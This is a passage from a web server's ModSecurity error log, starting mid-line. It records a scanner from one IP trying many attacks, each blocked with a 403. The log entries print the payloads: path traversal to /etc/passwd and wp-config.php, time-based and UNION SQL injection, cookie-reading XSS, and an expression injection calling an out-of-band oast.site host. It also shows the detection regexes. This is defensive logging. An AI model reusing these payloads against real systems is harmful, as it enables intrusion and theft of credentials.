"ZO1128Co-f0AAAW1WagAAAAD"]
[Tue Aug 29 11:36:44.435287 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWexlAAAAAP"]
[Tue Aug 29 11:36:49.448697 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAW51UoAAAAF"]
[Tue Aug 29 11:36:56.537508 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAWlCfkAAAAR"]
[Tue Aug 29 11:36:57.512956 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAW51YcAAAAF"]
[Tue Aug 29 11:37:07.923563 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAQSWcMAAAA0"]
[Tue Aug 29 11:37:09.409759 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAQSWdoAAAA0"]
[Tue Aug 29 11:37:16.408020 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAW9IWEAAAAI"]
[Tue Aug 29 11:37:16.676860 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAXCT@QAAAAG"]
[Tue Aug 29 11:37:16.691077 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAWuq@QAAAAZ"]
[Tue Aug 29 11:37:27.468161 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAWpXiwAAAAW"]
[Tue Aug 29 11:37:35.421200 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAWurCkAAAAZ"]
[Tue Aug 29 11:37:37.461023 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAWpXmEAAAAW"]
[Tue Aug 29 11:37:45.477727 2023] [:error] [pid 1490] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAXSzuMAAAAA"]
[Tue Aug 29 11:37:47.487023 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAARiDrUAAAAJ"]
[Tue Aug 29 11:37:50.441380 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAWvFNcAAAAa"]
[Tue Aug 29 11:37:52.416359 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAXA9kgAAAAO"]
[Tue Aug 29 11:37:59.366338 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXWLHUAAAAD"]
[Tue Aug 29 11:37:59.488379 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXWLHoAAAAD"]
[Tue Aug 29 11:38:10.836520 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXbb5QAAAAL"]
[Tue Aug 29 11:38:14.957340 2023] [:error] [pid 1519] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "116.206.15.31_f312355e526c0f38cfd426b7fb99f1d2bd0bc030"): Internal error [hostname "digilibft.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAXviF0AAAAb"]
[Tue Aug 29 11:38:14.957666 2023] [:error] [pid 1482] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "116.206.15.31_f312355e526c0f38cfd426b7fb99f1d2bd0bc030"): Internal error [hostname "digilibft.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAXK6CoAAAAY"]
[Tue Aug 29 11:38:15.148308 2023] [:error] [pid 1521] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "66.249.70.6_59c3d4f2509c82627f0eeb8e0e13ae1254eb4065"): Internal error [hostname "digilibft.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAXxYLkAAAAh"]
[Tue Aug 29 11:38:23.477083 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAXwLFMAAAAe"]
[Tue Aug 29 11:38:33.368120 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAXVyrQAAAAB"]
[Tue Aug 29 11:38:34.506522 2023] [:error] [pid 1524] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:view: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/help/index.jsp"] [unique_id "ZO12SsCo-f0AAAX0KnAAAAAl"]
[Tue Aug 29 11:38:34.509235 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:url: #{T(java.net.InetAddress).getByName('cjmnbitjmimt14dgn26gc7n8ow3fmb5qb.oast.site')}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js"] [unique_id "ZO12SsCo-f0AAARiDxgAAAAJ"]
[Tue Aug 29 11:38:35.361267 2023] [:error] [pid 1509] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/downloadfile.php"] [unique_id "ZO12S8Co-f0AAAXlRqoAAAAV"]
[Tue Aug 29 11:38:46.408347 2023] [:error] [pid 1565] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12VsCo-f0AAAYdUe0AAAAQ"]
[Tue Aug 29 11:38:47.363522 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12V8Co-f0AAAXbb78AAAAL"]
[Tue Aug 29 11:38:47.393574 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12V8Co-f0AAARiD0EAAAAJ"]
[Tue Aug 29 11:38:56.487130 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYWXY0AAAAF"]
[Tue Aug 29 11:38:57.384298 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAYIYlEAAAAM"]
[Tue Aug 29 11:38:57.395559 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAYh9RAAAAAK"]
[Tue Aug 29 11:39:06.573867 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAYcupsAAAAN"]
[Tue Aug 29 11:39:07.091571 2023] [:error] [pid 1690] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAaa-RAAAAAp"]
[Tue Aug 29 11:39:11.801953 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12b8Co-f0AAAXbcAUAAAAL"]
